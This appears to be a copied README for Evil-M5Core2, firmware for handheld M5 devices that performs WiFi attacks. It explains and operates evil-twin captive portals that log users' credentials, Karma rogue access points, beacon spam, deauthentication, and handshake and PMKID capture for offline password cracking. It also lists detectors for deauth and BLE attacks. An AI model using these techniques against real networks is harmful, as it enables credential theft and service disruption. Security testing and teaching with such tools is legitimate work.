https://github.com/7h30th3r0n3/Evil-M5Core2
Introduction
Evil-M5Core2 is an innovative tool developed for ethical testing and exploration of WiFi networks. It harnesses the power of the M5Core2 device to scan, monitor, and interact with WiFi networks in a controlled environment. This project is designed for educational purposes, aiding in understanding network security and vulnerabilities.
Disclaimer
The creator of Evil-M5Core2 is not responsible for any misuse of this tool. It is intended solely for ethical and educational purposes. Users are reminded to comply with all applicable laws and regulations in their jurisdiction. All files provided with Evil-M5Core2 are designed to be used in a controlled environment and must be used in compliance with all applicable laws and regulations. Misuse or illegal use of this tool is strictly prohibited and not supported by the creator.
Installation
- Connect your M5Core2 to your computer.
- Open the Arduino IDE and load the provided code.
- Ensure M5unified, TinyGpsPlus, ArduinoJson and adafruit_neopixel libraries are installed.
- Ensure esp32 and M5stack board are installed (Error occur with esp32 3.0.0-alpha3, please use esp32 v2.0.14 and below).
- Place SD file content needed on the SD card. ( Needed to get IMG startup and sites folder).
- Ensure to run the script in utilities to bypass the esp32 firmware. (be sure that the folder in the script exist, change if needed (M5stack/eso32))
- Ensure that the baudrates is at 115200.
- Ensure that PSRAM is disabled in tools menu.
- Upload the script to your M5Core2 device.
- Restart the device if needed.
Warning : for Cardputer you need to change the Flash size to 8MB and the Partition Scheme to 8M with spiffs (3MB APP/1.5MB SPIFFS) or space error may occur.
Features and explanation
Scan WiFi
- A fast scan is performed automatically upon startup to identify nearby WiFi networks. You can scan again with this functionnality.
Select Network
- Select a network from a list. Use the left and right keys to navigate and select the desired network. After selecting the network you can clone it.
Clone & Details
- View detailed information about the selected network. The informations listed are : SSID, Channel, Security used, Signal strengh and MAC address. You can also clone the SSID in this menu before starting the portal.
Start Captive Portal
- Deploy a web captive portal with html files stored on SD card in « sites » folder. The deployed portal take the name of previous selected Network SSID. This portal should pop-up automatically on some devices or provided a notifications to access the current network, when informations are provided on pages, you can see it on the credentials.txt file.
Special Pages
When Captive Portal is ON, you can access three functionalities protected by a password that hardcoded in the coded, it’s better that you change it before compiling to ensure security of data on the SD:
- /evil-m5core2-menu: Provides easy access to other pages with authentication, you need to enter the password to access others pages (default:7h30th3r0n3).
- /credentials: Lists captured credentials.
- /uploadhtmlfile: Upload files to the SD card, select the folder and send file on SD card ( consider to upload file less than 3Mo).
- /check-sd-file: Index to check, download, and delete files on the SD card.
- /Change-Portal-Password: Change the password of the deployed access point.
Stop Captive Portal
- Stop the captive portal and DNS.
Change Portal
- Choose the portal provided to connecting users. Lists only HTML files on sites folder at the root of SD Card.
Check Credentials
- View captured credentials : username, password, portal used and SSID when it was captured.
Delete Credentials
- Delete all previous captured credentials.
Monitor Status
- Consists of three static menus navigable using the left and right buttons.
Menu 1: System Overview
- Number of Connected Clients: Displays the number of currently connected clients.
- Credentials Count: Shows the number of passwords stored in credentials.txt.
- Current Selected Portal: Indicates the currently cloned portal.
- Portal Status: Displays whether the portal is ON or OFF.
- Provided Portal Page: Details about the current portal page.
- Bluetooth: Displays whether Bluetooth is ON or OFF.
Menu 2: Client Information
- MAC Addresses: Lists the MAC addresses of all connected clients.
Menu 3: Device Status
- Stack left: Displays the remaining stack in the device.
- Available RAM: Displays the remaining RAM in the device.
- Battery Level: Shows the current battery level.
- Temperature: Reports the device’s internal temperature.
Probe Request Process
When a WiFi-enabled device (such as a smartphone, laptop, or tablet) moves out of range of a known WiFi network and then comes back into range, it needs to reconnect to that network. To do this efficiently, the device uses a process involving « probe requests. »
- Probe Request Emission:
- The device actively scans for available WiFi networks by broadcasting probe request frames.
- These probe requests are essentially « pings » sent out by the device to check if the previously known networks are available nearby.
- Each probe request contains information about the network(s) the device is looking for, typically including the SSID (Service Set Identifier) of the network.
- Access Point Response:
- Nearby WiFi access points (APs) that match the SSID specified in the probe request will respond with a probe response frame.
- This response includes details such as the network capabilities, supported data rates, and other relevant information.
- Reconnection:
- Upon receiving a probe response, the device can then proceed to authenticate and associate with the access point, completing the reconnection process.
Probe Attack
- Sends fake random probes near you on all channels. Adjust time delay with left or right buttons (200 ms to 1000 ms). This functionnality can be used to mess with Sniffing devices like Evil-M5 or others by sending fake probe attack. You can send custom probes (change it on the config.txt file in config folder default RickRoll) or randomized characteres probes.
Probe Sniffing
- Starts a probe scan, capturing probes requests emissions, you can capture the SSID and store it on SD card at the end of the scan. Limited to 200 probes max. You can reuse it in Select probes menu to deploy it with start portal.
Karma
To better understand Karma Attack, check this article :
Karma Attack
- Similar to Probe Sniffing but allows selection of a unique SSID after the probes scan. It deploy a portal with the same SSID, Waiting for 60 seconds that a possible vulnerable devices connect to it. If a client connect automatically the portal is provided.
Karma Auto
- Automates Karma Attacks on captured probes, retrying every 15 seconds on first probe receive until a client connect or stopped by the user. Inspired by the pwnagotchi project but with probes and rogue AP.
Karma Spear
- Similar to Karma Auto but uses open SSIDs captured during wardriving. When the wardriving mode is used it ask at the end if you want to save Open network, if yes you populate the KarmaList.txt with it, you can also add custom SSIDs to KarmaList.txt.
Select Probe
- Menu to select a previously captured probe SSID and deploy it with start portal. Limited to 200 probes listed. You can also add custom SSIDs to probes.txt.
Delete Probe
- Menu to delete a unique previously captured probe SSID. Limited to 200 probes.
Delete All Probes
- Deletes all previously captured probes, resetting probes.txt on SD card.
Brightness
- Adjust the screen brightness. Stored in config.txt file in config folder.
Bluetooth ON/OFF
- Switch Bluetooth ON or OFF to be able to control it with serial bluetooth. Only on specific M5 devices.
Wardriving
Wardriving is the practice of driving around in a vehicle with a laptop or smartphone to detect and map the location of Wi-Fi wireless networks. This activity often involves using software and hardware tools to capture data about the networks, such as their SSIDs (network names), signal strengths, and security configurations. The goal can be to find open or weakly secured networks for internet access, to gather information for security assessments, or simply for hobbyist mapping purposes.
WIGLE (Wireless Geographic Logging Engine) is a website and app that collects and displays crowdsourced information about wireless networks worldwide. Users contribute data by uploading their wardriving results, which are then aggregated into a publicly accessible database and map. This data can be used for various purposes, including research, security analysis, and network planning.
- Scans WiFi networks and links them to positions in Wigle format, it can be used without GPS to populate KarmaList.txt. Requires indeed GPS.
Beacon Spam
Beacon spam, also known as SSID spam, is a technique used in wireless networking to broadcast multiple, often fake, Wi-Fi network names (SSIDs) to disrupt or manipulate the surrounding wireless environment. This practice can overwhelm users’ devices by presenting numerous network options, which can be confusing and potentially lead to connection issues. Beacon spam can be used maliciously to interfere with legitimate networks, make it difficult for users to connect to their intended Wi-Fi.
- Creates multiple networks on all channels, rendering multiple SSIDs in WiFi search. This functionnality is a workaround that I found that ensure similar attack without the bypass, but it’s less effective than sending forged frames, in other hand it’s causing some troubles on things like airodump and others it’s build in this way which is not the common way on others project
Deauther
Send deauthentication frames, inspired by Spacehuhn’s Deauther project. View the original project here.
A deauther, also known as a deauthentication tool or deauth tool, is a device or software used to send deauthentication frames to a Wi-Fi network, causing connected devices to disconnect. This can be used for various purposes, including network testing, security assessments, and malicious activities.
How Deauther Works
- Deauthentication Frames: In Wi-Fi networks, deauthentication frames are management frames that tell a device it has been disconnected from the network. These frames are part of the 802.11 standard and are meant to be used by legitimate network devices.
- Sending Deauthentication Frames: A deauther device or software sends these frames to one or more devices connected to a target Wi-Fi network, forcing them to disconnect.
- Reconnection: After being disconnected, devices will typically try to reconnect automatically. This creates an opportunity for the attacker to capture handshake data or disrupt network service.
Sniffing EAPOL 4-way handshakes and PMKID (Pairwise Master Key Identifier) are techniques used in the context of Wi-Fi security, particularly for cracking WPA/WPA2 protected networks.
Sniffing EAPOL 4-Way Handshakes
When a client device connects to a Wi-Fi network, the access point and the client perform a 4-way handshake to authenticate and generate encryption keys. This handshake involves four Extensible Authentication Protocol over LAN (EAPOL) messages. By capturing these handshake packets, an attacker can attempt to crack the Wi-Fi password offline.
- Capture Handshake: Using tools like Wireshark, Aircrack-ng, or similar, an attacker captures the 4-way handshake packets.
- Cracking: The attacker then uses software to perform a dictionary or brute-force attack on the captured handshake, attempting to guess the Pre-Shared Key (PSK) used to secure the network.
Sniffing PMKID
PMKID is another method used to attack WPA/WPA2 networks. This technique involves capturing the PMKID, which is present in the first message of the 4-way handshake in some implementations.
- Capture PMKID: Tools like hcxdumptool can be used to capture PMKID from the wireless traffic.
- Cracking: The captured PMKID is then subjected to a cracking process similar to that used for 4-way handshakes, typically using Hashcat.
Cracking
Once the necessary data (EAPOL handshake or PMKID) is captured, the process of cracking involves:
- Dictionary Attack: Using a list of potential passwords (wordlist), the cracking software attempts each password to see if it matches the captured handshake or PMKID.
- Brute-Force Attack: If a dictionary attack fails, a more exhaustive brute-force attack can be used, trying all possible combinations of characters up to a certain length.
Cracking these protections depends heavily on the complexity of the password and the computational power available. Strong, complex passwords can significantly mitigate the risk of successful cracking.
A script to transform pcap to hccapx is provided in utilities to try to crack password with hashcat.
On Evil-M5 :
To send deauthentication frames while sniffing EAPOL packets at the same time or not if you just want to send deauth :
- Select the network.
- Go to the deauther menu.
- Answer the prompted questions.
- Start deauth and sniff simultaneously.
Special thanks to Aro2142 and n0xa for their contributions.
Client Sniff And Deauth
Sniff connected clients and send deauthentication frames automatically. This feature is inspired by the original idea from Evilsocket’s Pwnagotchi project. You can view the original project here.
On Screen Information:
- AP: Number of access points near you.
- C: Current channel.
- H: Number of new PCAP files created (at least one EAPOL and beacon frame).
- E: Number of EAPOL packets captured.
- D: 0 = no deauth (only sniffing) / 1 = active deauth.
- DF: Fast mode.
Controls:
- Left Button: Toggle deauth ON/OFF.
- Middle Button: Return to menu.
- Right Button: Switch between fast/slow mode.
On cardputer : - D key : Toggle deauth ON/OFF.
- return key : Return to menu.
- F key: Switch between fast/slow mode.
Functionality:
- Scan for nearby access points.
- Sniff if a client is connected to the access point.
- Send broadcast deauth frames to each access point with connected clients.
- Send spoofed deauth frames for each client.
- Sniff EAPOL packets simultaneously.
- Loop back to scan nearby access points.
Handshake/Deauth Sniffing
Evil-M5Core2 can capture EAPOL (4-way handshakes and PMKID) packets, inspired by G4lile0’s Wifi-Hash-Monster project. View the original project here.
On Screen Information:
- Channel: Current channel.
- Mode: Static (stay on the same channel) / Auto (hopping through all channels).
- PPS: Packets per second on the channel (if no activity, PPS may show the last known number due to refresh on packet receipt).
- H: Number of new PCAP files created (at least one EAPOL and beacon frame).
- EAPOL: Number of EAPOL packets captured.
- DEAUTH: Number of deauthentication packets seen.
- RSSI: Signal strength (indicates distance from the transmitter).
If an EAPOL packet is detected, it is stored in a PCAP file with the MAC address of the AP and a beacon frame with the BSSID. You can use tools like Aircrack-ng or Hashcat to crack WiFi passwords using the 4-way handshake or PMKID.
A Python tool for processing multiple PCAP files into Hashcat format is provided in the utilities folder.
Detect Deauthentication Packets
Detect nearby deauthentication packets, which occur when a machine disconnects from an access point. These packets can be spoofed to disconnect devices, exploiting automatic reconnection to sniff the 4-way handshake. An abnormal number of deauthentication packets is a sign of a possible Wi-Fi attack.
This feature also detects nearby Pwnagotchi devices, printing the name and number of networks pwned, indicating if you are under attack.
Check Handshakes
Just list previous captures pcap.
Wall of Flipper
Flipper Zero Detection via Bluetooth
- Discover Flipper Name
- Discover Flipper Mac Address (normal/spoofed)
- Discover Flipper Color (Transparent, White, Black)
- Save Discovered Devices to SD Card
Identify Potential Bluetooth Advertisement Attacks
- Suspected Advertisement Attacks
- iOS Popup Advertisement Attacks
- Samsung and Android BLE Advertisement Attacks
- Windows Swift Pair Advertisement Attacks
- LoveSpouse Advertisement Attacks (Denial of Pleasure)
Change Startup Image
- Upload a 320×240 startup.jpg image to replace the original and personalize your Evil-M5Core2.
Laisser un commentaire